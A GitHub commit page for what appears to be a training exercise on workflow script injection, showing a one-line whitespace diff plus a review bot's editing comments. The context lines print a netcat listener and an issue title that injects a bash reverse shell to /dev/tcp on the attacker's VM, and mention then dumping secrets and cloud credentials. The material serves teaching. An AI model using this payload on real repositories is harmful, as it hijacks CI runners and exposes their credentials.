This repository has been archived by the owner on Nov 29, 2023. It is now read-only.

newline
robandpdx committed Sep 22, 2023
1 parent 7f69c1a commit cc2e9b2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion exercises/exercise-1.md
Expand Up @@ -13,7 +13,7 @@ Let's create a new issue with this title and see what happens. We observe that t
<img width="1042" alt="Screenshot 2023-08-30 at 7 38 43 PM" src="https://github.com/robandpdx/workflow-script-injection/assets/95243761/e3fa3917-2834-45cc-a297-d25614c3185e">

Ok. Big deal. So we were able to see what is in the workspace directory. Who cares?
Now let's try something a little more sinister...
Now let's try something a little more sinister...
Spin up a linux vm in the cloud that has a public IP address. Login and run `nc -nvlp 1337`. Then open a new issue with the title `octocat"; bash -i >& /dev/tcp/<YOUR-VM-IP-ADDRESS>/1337 0>&1 ; ls -l $GITHUB_WORKSPACE"`

Now I have a shell on the runner! This is a great "foot in the door" from which I can attemp other exploits, like dumping secrets or cloud credentials to use in other attacks.
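
Review bot: The replaced line, "Now let's try something a little more sinister...", reads identically on both sides, so this is a whitespace-only change (the commit message says only "newline"). If the goal is to have it render on its own line after "Who cares?", separate the two with a blank line rather than trailing spaces, which editors commonly strip on save. While this paragraph is being touched, "attemp" in the last context line should be "attempt". The visible text also stops at "Now I have a shell on the runner!"; a closing sentence that points the reader to the fix for the workflow (keeping the issue title out of the shell command text) and reminds them to delete the VM afterwards would make the step complete.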
